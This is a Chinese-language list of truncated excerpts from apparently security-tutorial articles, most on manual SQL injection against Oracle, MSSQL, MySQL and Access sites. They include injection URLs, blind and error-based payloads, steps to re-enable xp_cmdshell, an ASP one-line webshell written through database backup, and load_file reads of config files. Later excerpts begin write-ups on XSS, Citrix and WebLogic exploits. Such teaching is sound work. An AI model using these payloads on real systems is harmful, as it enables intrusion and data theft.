通过utl_http.request我们可以将查询的结果发送到远程服务器上，在遇到盲注时非常有用，要使用该方法用户需要有utl_http访问网络的权限。 1、检测是否支持utl_http.request utl_http.request 页面正常支持 http://www.jsporcle.com/news.jsp?id=1 and exists (select count(*) fromall_objects where object_name='UTL_HTTP') -- ...

1、注释符号 -- 空格 单行注释 /* */ 多行注释 2、判断是否注入 and 1=1 -- and 1=2 -- 3、列数 order by http://www.jsporcle.com/a.jsp?username=SMITH'order by 8 – 4、联合查询 因为oracle 对列的类型比较严谨 所以 要用null 可以匹配任意类型 Oracle中的dual表是一个单行单列的虚拟表 Dual 是 Oracl...

适用于盲注入，页面不返回信息 使用这种注入方法，需要一台带有sqlserver的机器。 原理就是把当前数据转发到远程的sqlserver上。 启用Ad HocDistributed Queries： ;execsp_configure 'show advanced options',1 reconfigure ;execsp_configure 'Ad Hoc Distributed Queries',1 reconfigure 为了安全使用完成后，关闭Ad HocDistrib...

sqlserver备份拿WEBSHELL <%execute(request("a"))%> 差异备份 经常会出错的 不稳定 log备份一句话 ;IFEXISTS(select table_name from information_schema.tables wheretable_name='test_tmp')drop table test_tmp;alter database mydb set RECOVERYFULL; ; drop table...

在SQLSERVER中是可以执行多行操作的 两条SQL语句是用分号隔开 select * from art; select * from admin xp_cmdshell默认在mssql2000中是开启的，在mssql2005之后的版本中则默认禁止。 如果用户拥有管理员sa权限则可以用sp_configure 重新开启它。 ;EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC&nbs...

SQL_SERVER 中每个数据库中都有 视图->系统视图 在这个下面都有很多关于这个库的表，表里面存放了很多关于这个库的信息。 COLUMNS 列 TABLES 表 1、查询当前用户 http://www.demo1.com/index.aspx?id=1 anduser_name()>1 2、根据当前用户爆出所有表 http://www.demo1.com/index.aspx?id=1and(select TABLE_NAME ...

sqlserver在语句执行错误的时候会报错 并且会在网页上显示出来。 环境 sql2008+aspx 显示系统信息 and @@version>0 利用mssql在转换类型的时候就出错时 会显示系统信息。   http://www.demo1.com/index.aspx?id=1 and @@version>0 爆出数据库 http://www.demo1.com/index.aspx?id=-1 and db_name()>0 当前用户 dbo http://www....

1、简介 sqlserver经常与asp或者aspx一起使用，操作系统多数是win2012win2018 数据库版本 sql2008 sql2012 http://www.demo1.com/index.aspx?id=1 2、注释符号 --空格 单行注释 /*   */ 多行注释 3、判断是否注入 ' 单引号是否报错 and 1=2 and 1=1 页面是否相同 4、判断列数 ...

延时注入属于盲注入的一种，这种注入通过mysql里面的sleep()函数,这个函数的意思是延时执行多少秒。 sleep通常与 if一起使用 例如  select if('root'='root',sleep(3),0) 如果 字符串root等于root 数据库延时3秒 否则输出0 延时方法是先获取数据的长度 selectif(LENGTH(version())=6,sleep(3),0) 再查询数据，这就是我们常用的一些字符 把他们转为ASCII码方便进行对比。 abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX...

上一课 给大家讲解了 mysql报错注入 其实他还有一些用法 例如读取文件 extractvalue读取文件 http://target_sys.com/mysqlinj.php?id=-1 and (extractvalue(1,concat(0x7e,(selectload_file('C:\\inetpub\\wwwroot\\target_sys.com\\data\\config.inc.php')),0x7e))) exp方法读取 http://target_sys.com/mysqlinj.php?id=1 and(exp(...

mysql在执行 SQL语句的时 如果语句有错 会返回报错信息，在与php结合使用的时候默认并不会把报错的信息在页面显示出来。 如果要在php显示出来 将在执行语句的时候使用mysql_error() 才可以把错误的信息 显示到页面。 $result=mysql_query("select * from article whereid=$id") or die(mysql_error()); 1、判断注入 and 1=1 and 1=2 2、爆库 id=info()将会得到...

MYSQL新特性secure_file_priv对读写文件的影响 此开关默认为NULL，即不允许导入导出。 secure_file_priv 为空是 的时候 方可读写由于这个参数不能动态更改，只能在mysql的配置文件中进行修改，然后重启生效。 可以通过命令查看这个属性 select@@secure_file_priv secure_file_priv为null    表示不允许导入导出 secure_file_priv指定文件夹时，表示mysql的导入导出只能发生在指定的文件夹 secure_file_priv没有设置时，则表示没有任何限制 ...

在上面一章mysql+php手工注入篇  在最后用到的一个函数 group_concat()可以将查询的字段的数据查询出来 可以用利这个函数 将mysql所有的库名查询出来 1、查询所有的库 http://target_sys.com/article.php?id=-1 union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1 http://target_sys.com/article.php?i...

1、mysql的注释符号 # --空格 /*里面的内容都会被注释*/ 用于注释后后面语句 不再执行 例如 select * fromartile where id=1#这个部分的语句不再执行 2、注入常用查询系统信息函数 version() MySQL 版本 user() 数据库用户名 database() 数据库名 @@datadir 数据库路径 @@version_compile_os 操作系统版本 3、判断是否存在注入 页面是否返回正常，或是否存在报错信息 ...

WEB安全第四章SQL注入篇03 注入的注入类型的区分详解 1.首先按照常用接收方式的不同可以分为以下三种 GET GET请求的参数是放在URL里的，GET请求的URL传参有长度限制 中文需要URL编码 URL最长的长度 https://www.cnblogs.com/cuihongyu3503319/p/5892257.html POST POST请求参数是放在请求body里的，长度没有限制 COOKIE cookie参数放在请求头信息，提交的时候 服务器会从请求头获取取 ...

WEB安全第四章SQL注入篇02 access+asp 逐字猜解法 1、判断注入 and 1=1 and 1=2 2、猜表 页面返回正常 说明 表存在 http://127.0.0.1:99/shownews.asp?id=110 and exists (select * from admin) 3、猜列 http://127.0.0.1:99/shownews.asp?id=110 and exists (select username from admin) http://127.0.0.1...

1、access数据库 access数据库与其他数据库不一样 他没有存储表的库，所以只能猜表。 2、access数据库结构 表 字段 数据 3、判断是否存在注入 and 判断 http://127.0.0.1:99/ProductShow.asp?ID=104 and 1=1 正确页面 http://127.0.0.1:99/ProductShow.asp?ID=104 and 1=2 错误页面or 判断 or方法判断 h...

程序介绍 程序采用PHP5.4 + MySQL 程序结构如下 基本上目前做此类违法站点的不法分子，除了外包以外就是天恒、大发几套程序模改的。暂时，这边由于技术水平上面的问题，只能够发出天恒的。版本可能有点老。但是，一大部分还是用的。经某位不愿透露自己姓名的网友4月中旬实测，大约70%的存在这些问题，而使用这套程序的违法站点经过半个小时的采集大约在5000~20000左右。 漏洞详情 1、money – SQL注入 webwjactiondefaultPayOnlineBack.class.ph...

前言 无聊寂寞（这不是重点），去应用市场上下载了某个同城约x软件，点开软件，首先不需要登录/注册就可以进来。。就感觉发现有问题了。 主界面是长这样的，类似探探一样可以选择心动或者忽略，忽略之后就会蹦出下一个女生的照片： 瞎划几下，就有一堆女的找我聊天，直觉告诉我这肯定是机器人： 注入点 在设置中心 -> 反馈建议处插入 xss payload： 接收...

我们废话不多说，直接看过程吧！ 源码的获取来源我就不透露了，找下载这种源码的站，想办法把卖源码的站撸了，然后免费下载就完事了 目标站点使用的源码就是下面这套，名字就不透露了，主要分享审计思路和渗透思路 先来看看目录结构 1 Web前台默认解析的是main目录Admin后台管理解析的是admin目录 ...

在这篇文章中，我们将教大家如何利用Windows系统中的一个功能来绕过Windows 10的用户组策略。虽然绕过用户组策略并不意味着就是“世界末日”了，但是这毕竟是一种违规的危险操作，而且根据不同的用户组策略配置，这种绕过行为也会产生不同的安全后果。目前，我们已在Windows 7和Windows 10 64位企业版（10.18363 1909）中进行了测试，而且利用过程不需要管理员权限。这种技术跟系统在用户登录时对用户账号注册表的加载过程有关，因此我们首先需要了解Windows账号的登录过程。 用户登录 当用户登录一个Windows账号时会发生很多事情，其中一个就是为该账号加载用户...

一、前言 一句话木马用到了一个比较有趣的命令下发思路，即不直接发送命令编码，而是将命令代码直接发送给木马端执行，这样木马端文件会特别小，而由于每条命令需要通过网络传输，数据包会比较大。这些工具的流量也是ips，waf等网络安全设备的检测重点。 一句话木马的发展主要有几个典型的代表：最开始是中国菜刀，接着是开源的Cknife和中国蚁剑，到近两年的冰蝎，攻击工具一直在进化。其实还有个神奇的二进制远控 Poison Ivy，说它神奇就在于它相当于一个二进制的一句话工具，直接传送shellcode到被控端执行，而且据说这个远控是比较早（零几年就出现了），有高手在github重写了一份代码...

去年底，Citrix高危漏洞CVE-2019-19781被披露，158多个国家的8万多家公司网络系统受其影响，面临严重安全风险，漏洞包含目录遍历和远程代码执行，攻击者若成功利用该漏洞，可在未授权情况下访问受害者公司内部网络，还可实现任意代码执行。而恰巧最近，我在一次安全评估中就遇到了该漏洞，分享于此，希望能对大家有用。 CVE-2019-19781也被称为“Shitrix”，概括来看，它的漏洞利用机制用到了Citrix网关应用的模板处理过程，由于在创建模板的过程中，会调用到/vpn/../vpns/portal/scripts/newbm.pl下的脚本服务，为此，我们可以构造一些Perl 语言的...

一、前言 Weblogic反序列化漏洞是一个经典的漏洞系列，根源在于Weblogic（及其他很多java服务器应用）在通信过程中传输数据对象，涉及到序列化和反序列化操作，如果能找到某个类在反序列化过程中能执行某些奇怪的代码，就有可能通过控制这些代码达到RCE的效果。随着每次补丁的修复，很多Weblogic反序列化的思路都被封禁了，但是跟Struts2系列漏洞不同的是，Weblogic漏洞由于涉及的面比较广，所以近几年还是持续有新出漏洞的，这也体现了挖掘出新漏洞的高手们对java语言理解之深。目前在做渗透测试时，Weblogic漏洞主要也是碰碰运气，用来攻击没打补丁的系统会比较有效。 ...

写在前面的话 在这篇文章中，我们将演示如何利用Frida脚本来绕过Android的网络安全配置，这是一种绕过网络安全配置的新技术。除此之外，我们还将演示如何在其他场景来测试该脚本，并分析脚本的运行机制。 在之前的一次Android应用程序安全审计过程中，首先我们要做的就是准备渗透测试的环境，并配置应用程序来绕过网络安全配置。由于我个人比较喜欢Frida，因此它也就成为了我的首选工具。 当时我下载了两到三个脚本，但是当我在Android 7.1.0中运行脚本时，没有一个可以成功的。这也就是为什么我想研究网络安全配置的运行机制，并且如何用Frida绕过它们。 我所...